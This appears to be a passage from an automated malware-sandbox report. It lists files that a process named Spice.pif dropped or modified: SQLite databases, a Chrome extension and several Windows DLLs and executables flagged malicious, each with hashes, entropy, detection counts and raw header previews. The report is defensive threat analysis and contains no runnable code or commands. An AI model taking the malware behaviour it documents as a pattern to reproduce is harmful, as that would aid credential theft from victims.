                                                                                                                                                                                                                                    Size (bytes):159744
                                                                                                                                                                                                                                    Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                    MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                    SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                    SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                    SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                    Size (bytes):45352
                                                                                                                                                                                                                                    Entropy (8bit):0.3940876416121774
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:CexI5QurB/IyQTll7DYMrbxIO8VFDYMrSp:SqVdll4xjVG
                                                                                                                                                                                                                                    MD5:B51CD8F4331276235DFA5BF1EAAF1A9E
                                                                                                                                                                                                                                    SHA1:E8A9B579E4CDE21510D0C55B7A86417D7A72991D
                                                                                                                                                                                                                                    SHA-256:7ECF7C676E22ABDEBAE5A0DBBFBBE5A67B98BAAE6257B328B881A0411918A3F0
                                                                                                                                                                                                                                    SHA-512:DADEC45650D670A49AA4EC40562741DC8A602932181D03B1222AB0B59EA918FC51F1DA9DDB93976AE93C706EEA82DC6F27C218BABDC88B95758425D42984F78B
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:7....-........... .g._..<.$..7[/......... .g._..w...D.ISQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):4814
                                                                                                                                                                                                                                    Entropy (8bit):7.909739359753065
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:K9DcEoTtp9feekTeBInbpzQK/XMEkyS+v86l1pjb5vFQIRwDYPc:K56zAMWpQK/cyz8A7jb5vGIqQc
                                                                                                                                                                                                                                    MD5:6E6FE97CBC259DB47CD8423141CF35A3
                                                                                                                                                                                                                                    SHA1:EE7D38E394FC87FBF2D4CBF7A45A56E270D667E1
                                                                                                                                                                                                                                    SHA-256:1B2BA8FC90BA68CD057B9CAAFFC218EAD59A23E37F79192ED37D0C3A7A8BAB03
                                                                                                                                                                                                                                    SHA-512:9FEE51391A289037D36344E22A49D5D4B863F30FFD19B4377D61E57EF389599F2F2790C41B6902C45BAF27B21A1F6916B6B6DF61A490A35592BE8CD1164E1966
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:Cr24....t.........0.."0...*.H.............0.........,.*i....9M..uEW....}.n..u..._3.08.:D.e]..'J...........l..)8`....:..P}........p..w(...v...Cm@....6..8...$._v....#a(.p..o:..=.....ef.C....M+.s.0g..@.'4.$ZN..e.....T.. ...F..;Sij[...&ZTH[.].D.z. ...A..<z...Ti....&..Z&u....D......\un.....................mR...B[.r..X...;.R..*Y...j...x...3.9.h...R.L....a....V%[.W_/v.A}.VV....H..1..s.9lH.7...M..^.|.C5...#..`...dJ.."..8....w......L../.........w....v.A....0..P....JU...~.-..[....K.d..i%.7....?].......1RiP..A.... ...b ...V2............f._~....IH.c.......0.."0...*.H.............0.........]......N..h...A..LY.*..%.s.....d..h#-/.U.I9..,.<.O1.)7.l.:W2..: ...E...2..s..W..T..|3.....W*S2N}.0g...T...b.q..wp.u....Z...)..2e}.r...!.u......@A..A..g.<.+:....m..[.....4..C&...*.."..}/9y%.....*..m..,.y...1...<=."eyI.G.@.3..=.....(.-...M..8A........q......:...L`\.q..?Rn.W/.\a...g...).....Q...8....*.*.J5.Z.~....0.Lt|...d....D......=...}A3bG.Ra.oyZ..BP..,t./.0...w..WA.p.
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):106496
                                                                                                                                                                                                                                    Entropy (8bit):1.1373607036346451
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                                                                                                                                                                                    MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                                                                                                                                                                                    SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                                                                                                                                                                                    SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                                                                                                                                                                                    SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                                                                    Entropy (8bit):1.1209886597424439
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                                                                                                                                                                    MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                                                                                                                                                                    SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                                                                                                                                                                    SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                                                                                                                                                                    SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):685392
                                                                                                                                                                                                                                    Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                    MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                                    • Filename: 34cFFMVY3B.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: HFtuDDkdi6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: A4eSWqbQPf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: N3MZMKV5GN.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: nJGNa9kHJf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: 7PFj8ZyNTr.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: HpsVE4Pwxn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: u7p2rff5aP.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):608080
                                                                                                                                                                                                                                    Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                                    • Filename: 34cFFMVY3B.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: HFtuDDkdi6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: A4eSWqbQPf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: N3MZMKV5GN.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: nJGNa9kHJf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: 7PFj8ZyNTr.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: HpsVE4Pwxn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: u7p2rff5aP.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):450024
                                                                                                                                                                                                                                    Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2046288
                                                                                                                                                                                                                                    Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):257872
                                                                                                                                                                                                                                    Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                    MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):80880
                                                                                                                                                                                                                                    Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                    MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):155648
                                                                                                                                                                                                                                    Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                    MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                    SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                    SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                    SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                    Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):51200
                                                                                                                                                                                                                                    Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                    Size (bytes):893608
                                                                                                                                                                                                                                    Entropy (8bit):6.620254876639106
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                                                                                                                                                                                                                    MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                                                                                                                                                                    SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                                                                                                                                                                                                                    SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                                                                                                                                                                                                                    SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 7%
                                                                                                                                                                                                                                    • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    File Type:OpenPGP Public Key
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):348094
                                                                                                                                                                                                                                    Entropy (8bit):7.999496119326081
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:6144:fgygdmxW9wobOq09itcKOrokJ8t5wcvisnrs9QkwC1uBVIkw9+:2dVY9itQrokStrAJuvIg
                                                                                                                                                                                                                                    MD5:1DC1E211A5797997C9B6C85CC50F6D48
                                                                                                                                                                                                                                    SHA1:1B29C41DAFBA8A94FC366CBA4977ABCE6A8EE517
                                                                                                                                                                                                                                    SHA-256:97A11AB47A79A2D2E8C5AAB13220B5C8BE0D48FDFC691BBB77C46F85110170A7
                                                                                                                                                                                                                                    SHA-512:E79025B9E0E887CD02FE76D71CE51220266BD1C8CCC80B161432F35DA3ECA7C8B6EA8800508728B32748EB96D545AFA4F43D7657FCDC1256A243C6366B82B7BE
                                                                                                                                                                                                                                    Malicious:false
